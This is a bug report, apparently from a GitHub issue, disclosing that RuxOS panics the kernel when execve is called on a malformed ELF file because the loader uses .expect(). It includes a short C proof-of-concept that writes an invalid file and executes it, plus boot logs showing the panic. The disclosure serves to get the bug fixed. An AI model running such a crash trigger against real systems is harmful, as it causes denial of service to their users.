Kernel panic in `execve` when parsing invalid/malformed ELF files

[nuczyc]

Describe the bug

RuxOS triggers a kernel panic when a user-space application calls the execve system call on a file that is not a valid ELF executable. This occurs because the ELF loader uses .expect() on the result of the parsing function, leading to a system-wide crash instead of returning an error code (like ENOEXEC) to the calling process.

ruxos/api/ruxos_posix_api/src/imp/execve/load_elf.rs

Line 49 in 32a8fe8

.expect("parse ELF failed");

To Reproduce

1. Compile the program and run.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>

/*
 * PoC for RuxOS ELF parsing vulnerability
 * 
 * This program triggers a kernel panic in RuxOS by:
 * 1. Creating a file with invalid ELF content
 * 2. Calling execve() on that file
 * 
 * The crash occurs in load_elf.rs:48 when minimal_parse() fails
 * and .expect() panics with "parse ELF failed"
 * 
 * This is user-reachable through the execve system call.
 * Any invalid/corrupted ELF file passed to execve will trigger this.
 */

int main() {
    const char *filename = "/tmp/invalid_elf";
    int fd;
    
    // Create a file with invalid ELF content
    fd = open(filename, O_CREAT | O_WRONLY | O_TRUNC, 0755);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    
    // Write invalid ELF magic bytes (not a valid ELF file)
    // This will cause minimal_parse() to fail and trigger the panic
    char invalid_elf[] = "INVALID_ELF_FILE_CONTENT";
    write(fd, invalid_elf, sizeof(invalid_elf));
    close(fd);
    
    printf("Attempting to execute invalid ELF file: %s\n", filename);
    printf("This should trigger kernel panic in RuxOS at load_elf.rs:48\n");
    
    // Call execve with the invalid ELF file
    // This will cause the kernel to try parsing it as ELF and panic
    char *argv[] = {filename, NULL};
    char *envp[] = {NULL};
    
    int ret = execve(filename, argv, envp);
    
    // If we reach here, execve failed
    perror("execve");
    printf("execve failed with errno: %d\n", errno);
    
    // Clean up
    unlink(filename);
    
    return 0;
}

2.features.txt

alloc
paging
net
multitask
irq
fs

Environment

• RuxOS version:[Merge pull request #219 from syswonder/dev · syswonder/ruxos@32a8fe8](32a8fe8)

Logs

SeaBIOS (version 1.16.3-debian-1.16.3-2)


iPXE (https://ipxe.org) 00:03.0 CA00 PCI2.10 PnP PMM+7EFCAA40+7EF0AA40 CA00
                                                                               


Booting from ROM..
Initialize IDT & GDT...

8888888b.                     .d88888b.   .d8888b.
888   Y88b                   d88P" "Y88b d88P  Y88b
888    888                   888     888 Y88b.
888   d88P 888  888 888  888 888     888  "Y888b.
8888888P"  888  888 `Y8bd8P' 888     888     "Y88b.
888 T88b   888  888   X88K   888     888       "888
888  T88b  Y88b 888 .d8""8b. Y88b. .d88P Y88b  d88P
888   T88b  "Y88888 888  888  "Y88888P"   "Y8888P"

arch = x86_64
platform = x86_64-qemu-q35
target = x86_64-unknown-none
smp = 1
build_mode = debug
log_level = warn

[  0.230531 0 axfs_ramfs::dir:68] AlreadyExists sys
Attempting to execute invalid ELF file: /tmp/invalid_elf
This should trigger kernel panic in RuxOS at load_elf.rs:48
[  0.231722 0:1 ruxruntime::lang_items:14] panicked at api/ruxos_posix_api/src/imp/execve/load_elf.rs:49:14:
parse ELF failed: BadMagic([73, 78, 86, 65])